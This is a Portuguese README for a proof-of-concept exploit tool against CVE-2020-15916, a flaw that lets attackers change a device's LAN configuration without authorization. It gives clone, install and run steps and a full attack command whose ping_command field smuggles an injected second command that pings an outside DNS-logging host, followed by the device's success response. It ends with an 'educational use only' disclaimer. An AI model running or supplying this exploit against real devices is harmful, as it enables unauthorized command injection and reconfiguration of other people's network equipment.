
Este projeto é um PoC para explorar o CVE-2020-15916, uma vulnerabilidade que permite alterações não autorizadas na configuração de LAN de um dispositivo.
GenLANConfigAttack - é um PoC para explorar CVE-2020-15916, uma vulnerabilidade que permite alterações não autorizadas na configuração de LAN de um dispositivo.
git clone https://github.com/geniuszly/CVE-2020-15916
pip install -r requirements.txt
python GenLANConfigAttack.py
target_ip: O endereço IP do dispositivo alvo.ping_command: Comando a ser executado no dispositivo alvo.session_password: Senha para acesso à sessão.python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
[Resposta de 192.168.0.1]:
{"success":true,"message":"Configuração de IP da LAN atualizada com sucesso"}
Este PoC é para a vulnerabilidade CVE-2020-15916, que permite que atacantes alterem a configuração de LAN de dispositivos vulneráveis explorando um mecanismo de autenticação fraco.
Esta ferramenta é fornecida apenas para fins educacionais. Use-a com responsabilidade e apenas em ambientes onde você tenha permissão explícita.